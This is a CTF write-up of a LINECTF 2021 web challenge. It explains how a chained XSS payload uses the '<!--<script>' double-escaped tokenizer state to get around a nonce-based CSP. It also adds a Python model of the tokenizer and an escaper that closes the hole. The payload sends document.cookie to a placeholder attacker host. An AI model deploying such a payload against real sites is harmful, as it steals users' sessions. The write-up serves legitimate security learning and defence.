LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN
On this page, CSP was applied. Since a nonce directive is given, we have to reuse existing script tags that already carry a valid nonce.
First, we can inject a 16-byte display name into the admin-restricted page, where it is rendered inside a script tag:
const sharedUserName = "{{ shared_user_name }}";
Second, we can inject 64 and 128 bytes, respectively, into the rendered data. However, since the single quote is escaped there, we can't reuse that script tag.
We might then think of commenting out everything between the first and second injection points, but </script> takes priority over a JS comment, so normally it breaks the comment in the middle.
However, when we open another script tag inside an HTML comment in script context, as in <script><!--<script>, the HTML parser's tokenizer switches to the script data double escaped state, in which the </script> in the middle is ignored.
display name : <!--<script>"}/*
title : --> /*
content : */ location.href='(attacker)/c='+document.cookie
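To show why the chained payload survives the intermediate </script> and what closes the hole, here is an added example (not part of the original writeup) that models the tokenizer's script data, escaped and double escaped states and runs the payload shape above through a constructed template, once with a quote-only escaper and once with one that also encodes '<'. The template, nonce value, escaper names and the benign content string are assumptions, not the challenge's code.

```python
import json

_TERM = " \t\n\f/>"  # characters that terminate a tag name in the tokenizer

def script_body_end(html, start):
    """Index where the HTML tokenizer ends the <script> element whose
    content begins at `start`, modelling the script data, escaped and
    double escaped states (the '<!--<script>' trick from the writeup)."""
    lower, n = html.lower(), len(html)
    state, dashes, i = "data", 0, start

    def tag_at(pos, name):
        end = pos + len(name)
        return lower.startswith(name, pos) and (end == n or lower[end] in _TERM)

    while i < n:
        if state == "data":
            if tag_at(i, "</script"):
                return i
            if lower.startswith("<!--", i):          # -> script data escaped
                state, dashes, i = "escaped", 2, i + 4
                continue
        elif state == "escaped":
            if tag_at(i, "</script"):
                return i
            if tag_at(i, "<script"):                  # -> script data double escaped
                state, dashes, i = "double", 0, i + 7
                continue
        elif tag_at(i, "</script"):                   # double escaped: only drops back to escaped
            state, dashes, i = "escaped", 0, i + 8
            continue
        c = html[i]
        if c == "-":
            dashes += 1
        elif c == ">" and dashes >= 2:                # '-->' returns to plain script data
            state, dashes = "data", 0
        else:
            dashes = 0
        i += 1
    return n                                          # EOF inside the script element

# Constructed page modelled on the challenge: display name inside a JS string in a
# nonce'd script tag, title and content rendered into HTML further down (assumed layout).
TEMPLATE = ('<script nonce="n0nce">const sharedUserName = "{name}";</script>\n'
            '<h1>{title}</h1>\n<p>{content}</p>\n')

def quote_only_escape(value):
    return value.replace('"', '\\"')                  # leaves '<' untouched (assumed weak escaper)

def js_string_escape(value):
    return json.dumps(value)[1:-1].replace("<", "\\u003c")  # '<' can never open a tag

def rendered_script_body(name, title, content, escape):
    html = TEMPLATE.format(name=escape(name), title=title, content=content)
    start = html.index(">") + 1                       # content starts after the opening script tag
    return html[start:script_body_end(html, start)]

NAME, TITLE, CONTENT = '<!--<script>"}/*', "--> /*", "*/ console.log('reached')"
```

With quote_only_escape the returned script body runs past the literal </script> to the end of the page, exactly what the payload relies on; with js_string_escape it stops at the first </script>, because no '<' survives inside the string.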
LINECTF{0n1y_u51ng_m0d3rn_d3fen5e_m3ch4n15m5_i5_n0t_3n0ugh_t0_0bt41n_c0mp13te_s3cur17y}